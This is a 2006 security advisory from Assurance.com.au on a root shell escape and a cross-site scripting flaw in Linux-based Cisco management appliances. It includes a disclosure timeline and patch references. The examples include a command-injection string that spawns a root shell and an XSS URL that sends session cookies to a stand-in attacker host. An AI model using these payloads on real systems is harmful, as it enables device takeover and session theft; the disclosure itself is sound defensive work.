<<< Date Index >>>     <<< Thread Index >>>

Multiple vulnerabilities in Linux based Cisco products



Assurance.com.au - Vulnerability Advisory
-----------------------------------------------
Release Date:
 19-Apr-2006

Software:
 Cisco Wireless Lan Solution Engine (WLSE)
 Cisco Hosting Solution Engine (HSE)
 Cisco Ethernet Subscriber Solution Engine (ESSE) 
 Cisco User Registration Tool (URT)
 CiscoWorks2000 Service Management Solution (SMS) 
 Cisco Vlan Policy Server (VPS)
 Cisco Management Engine (ME1100 Series)
 CiscoWorks Service Level Manager (SLM)


Vulnerabilities discovered:

 (1) A Vulnerability in the CiscoWorks WLSE "show" CLI application allows
     execution of arbitrary code as the root user. 

 (2) Cross-site scripting flaw allows session theft

Vulnerability impact of each:

 (1) Medium - An authenticated user can gain root access to the Linux based 
              system

 (2) Low - A targeted attack could lead to session theft and administrator
           compromise

Vulnerability information

 (1) The Cisco shell presents the administrator with a restricted set of 
     commands which includes a "show" application. The "show" application has
     several vulnerabilities which allow an attacker to "break out" of the 
     shell and execute commands (including /bin/sh) as the root user.

     This "show" application has been in use on this Linux-based platform 
     build since 1999 and exists on several other Linux-based Cisco products.

 Example:
  An Administrator is logged into the Cisco WLSE via either Telnet or SSH.

  admin@wlse: show version
   (C) Copyright 2005 by Cisco Systems Inc.
   WLSE 1130 Release 2.11FCS Thu Apr 14 00:09:56 UTC 2005
   Device Limit = 2550
   Build Version (67) Tue Mar 15 18:13:02 UTC 2005
   Uptime: 2 days 3 hours 32 mins
   Linux version 2.4.28-5_WLSEsmp (root@xxxxxxxxxxxxxxx) (gcc version 2.96 
20000731
   (Red Hat Linux 7.3 2.96-113)) #1 SMP Mon Jan 31 16:04:20 PST 2005
   1130
   Intel(R) CPU at  3065.897 Mhz with 3105924K bytes of memory.

  admin@wlse: show syslog include ";/bin/sh -i;"

  sh-2.05a# id
   uid=0(root) gid=502(admin) groups=502(admin),500(enable)

  At this point the administrator has root level access to the Linux-based
  Cisco device.

 (2) A cross-site scripting flaw exists in:
      /wlse/configure/archive/archiveApplyDisplay.jsp
    with the "displayMsg" parameter. This can be used to steal the JSP session
    cookie, therefore giving a targeted attacker admin level access to the 
    system.  Once the attacker has admin web GUI access to the system via the 
    XSS, they can then change the admin password or create a new admin user 
    (without requiring the admin password).
    
    The attacker can then use the aforementioned "show cli" local root 
    vulnerability to gain complete control of the Cisco Linux-Based system.
    
    As with (1) above Telnet or SSH access is required to login with the 
    newly created user with admin level access in order to exploit the 
    "show cli" bug.

  Example:
   http://cisco-wlse.example.org/wlse/configure/archive/ \
   archiveApplyDisplay.jsp?displayMsg=<script>document.location='http:// \
   attacker.example.org?'+document.cookie</script>
 
  The cookie posted to attacker.example.org includes the JSESSIONID token:
   ORIG_URL=cisco-wlse.example.org; browser_tzoffset=-660; \
   JSESSIONID=johjehk2h1; \
   HSE_TKT=admin:1133234898:17e5187e228ab1546ac26ef4ecacf689

  When combined with vulnerability (1), it allows a targeted attacker to gain
  root access to the linux system.  

Solution:
 Cisco has released patches for the vulnerabilities.

References:
 Assurance.com.au advisory
 http://www.assurance.com.au/advisories/200604-cisco.txt

 Cisco advisory note:
 http://www.cisco.com/warp/public/707/cisco-sa-20060419-wlse.shtml
 
 Cisco security response:
 http://www.cisco.com/warp/public/707/cisco-sr-20060419-priv.shtml

Credit:
 Adam Pointon of Assurance.com.au
 http://www.assurance.com.au/

Disclosure timeline:
 30-Dec-2005 - Discovered during configuration for a customer
 29-Jan-2006 - Email sent to psirt[at]cisco.com with full technical details
 31-Jan-2006 - Response received from Cisco psirt
 01-Feb-2006 - Cisco advises bug reports have been opened for both issues
 05-Apr-2006 - Cisco releases patches to Assurance.com.au for testing
 19-Apr-2006 - Advisory released

About us:
Assurance.com.au is a specialised information security consultancy. 
Our mission is to help organisations identify and secure information 
assets. Our expertise concentrates in security architecture, managed 
security and professional services in security testing/review and 
compliance. 

Supporting this approach are services in the following areas: 

* Compliance Services - Penetration testing, security reviews, 
compliance and audit services 

* Wireless and mobility solutions - design, installation and 
management of IEEE 802.11a/b/g (WiFi), tele-mobility and other 
wireless solutions 

* UNIX-like systems, networks and security advice and consulting 

Assurance consults to a wide array of organisations; small companies
to large enterprise, utilities and government departments and 
agencies. Its security professionals are respected as being amongst 
the best in Australia and are quoted regularly in media. Assurance is 
one of the few security organizations based in Australia actively 
conducting vulnerability research resulting in public security 
advisories. 

Assurance's experience, expertise and vendor-neutral focus ensures 
we are able to assess and objectively recommend appropriate solutions.